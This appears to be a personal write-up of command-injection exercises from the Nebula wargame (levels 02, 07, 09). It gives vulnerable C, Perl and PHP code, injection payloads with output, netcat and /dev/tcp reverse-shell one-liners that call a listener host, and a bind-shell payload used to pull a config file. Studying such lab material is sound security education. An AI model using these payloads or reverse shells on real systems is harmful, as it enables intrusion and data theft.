03.Classic_Command_Injection.md

Classic Command Injection

Command Execute Functions in C

system()
execl()
execlp()
execv()
execvp()
execle()
execve()
popen()
etc...

Nebula Level02 [ Description ]

Vulnerble Code

char *buffer;
buffer = NULL;
asprintf(&buffer, "/bin/echo %s is cool", getenv("USER"));
printf("about to call system(\"%s\")\n", buffer); 
system(buffer);

Getting environment variable "USER" and about to execute this string

Export USER with random value and Running Program

level02@nebula:~$ export USER=aaaa
level02@nebula:~$ /home/flag02/flag02
about to call system("/bin/echo aaaa is cool")
aaaa is cool

Running two Command in Linux ( Many ways )

level02@nebula:~$ id;whoami
uid=1003(level02) gid=1003(level02) groups=1003(level02)
level02

Command Injection and Solving Level02

/bin/echo [INPUT] is cool
/bin/echo Break;getflag;echo is cool 
level02@nebula:~$ unset USER
level02@nebula:~$ export USER="Break;getflag;echo"
level02@nebula:~$ /home/flag02/flag02
about to call system("/bin/echo Break;getflag;echo is cool")
Break
You have successfully executed getflag on a target account
is cool

Nebula Level07 [ Description ]

Vulnerable Code

#!/usr/bin/perl 
use CGI qw{param}; 
print "Content-type: text/html\n\n"; 
sub ping { 
	$host = $_[0]; print("<html><head><title>Ping results</title></head><body><pre>"); 
	@output = `ping -c 3 $host 2>&1`; foreach $line (@output) {
		print "$line"; } 
	print("</pre></body></html>"); 
		} 
		# check if Host set. if not, display normal page, etc 
ping(param("Host"));

Backticks is alternative way to execute command in PERL [ Ref ] Running Port

tcp6       0      0 :::7007                 :::*                    LISTEN

HTTP Requests from My Windows Host

$ curl http://192.168.43.229:7007/index.cgi?Host=192.168.43.234
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100    57    0    57    0     0      9      0 --:--:--  0:00:06 --:--:--     0

Command Injection

ping -c 3 $host 2>&1
ping -c 3 [ INPUT ] 2>&1
ping -c 3 ; getflag 2>&1  #No Result

#Final Payload
127.0.0.1%3bgetflag

Result

thinb@DESKTOP-U4MGHBB ~
$ curl http://192.168.43.229:7007/index.cgi?Host=127.0.0.1%3Bgetflag
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   504    0   504    0     0    252      0 --:--:--  0:00:02 --:--:--   246
<html><head><title>Ping results</title></head><body><pre>PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_req=1 ttl=64 time=0.023 ms
64 bytes from 127.0.0.1: icmp_req=2 ttl=64 time=0.021 ms
64 bytes from 127.0.0.1: icmp_req=3 ttl=64 time=0.030 ms

--- 127.0.0.1 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 1998ms
rtt min/avg/max/mdev = 0.021/0.024/0.030/0.006 ms
You have successfully executed getflag on a target account
</pre></body></html>

Netcat TCP Reverse Shell ( Blind Command Injection ) Listenting on My Computer

nc -lvp1234

Giving a Shell with e

nc -e /bin/bash 192.168.43.234 1234

Without e

mknod /tmp/backpipe p/bin/sh 0</tmp/backpipe | nc **attacker_ip** 4444 1>/tmp/backpipe

Using Dev

127.0.0.1; bash -i >& /dev/tcp/192.168.43.234/1234 0>&1;

Don't need for Nebula 007

Data Exfiltration with Bind Shell ( if we need to read flag )

nc –l –p {port}  <  {file/to/extract}
127.0.0.1; nc.traditional -l -p 1234 < thttpd.conf

Payload

curl http://192.168.43.229:7007/index.cgi?Host=127.0.0.1%3B%20nc.traditional%20-l%20-p%201234%20%3C%20thttpd.conf

Connect

C:\Users\thinb>nc 192.168.43.229 1234
# /etc/thttpd/thttpd.conf: thttpd configuration file

# This file is for thttpd processes created by /etc/init.d/thttpd.
# Commentary is based closely on the thttpd(8) 2.25b manpage, by Jef Poskanzer.

# Specifies an alternate port number to listen on.
port=7007

# Specifies a directory to chdir() to at startup. This is merely a convenience -
# you could just as easily do a cd in the shell script that invokes the program.
dir=/home/flag07

Nebula Level09 [ Description ]

Vulnerable Code PHP

$contents  =  preg_replace("/(\[email (.*)\])/e",  "spam(\"\\2\")",  $contents);

I already explained in LOL Free Web Security Class. [ Watch Here ]

Other Command Injection Python Sandbox Escape ( Read More )

os.system () 
os.popen () 
ommands.getstatusoutput() 
commands.getoutput() 
commands.getstatus() 
subprocess.call(command, shell=True) 
subprocess.Popen(command, shell=True) 
pty.spawn()

Python Pickle Command Injection ( DIY )
Level 17 in Nebula -> Do it yourself
Level 12 in Nebula -> DIY ( Python popen)

References
https://blog.securityinnovation.com/blog/2011/06/how-to-test-for-command-injection.html http://man7.org/linux/man-pages/man3/asprintf.3.html https://www.perlmonks.org/?node_id=380670 https://medium.com/@shadowslayerqwerty/creating-a-netcat-reverse-shell-without-e-89b45134de99 https://www.contextis.com/us/blog/data-exfiltration-via-blind-os-command-injection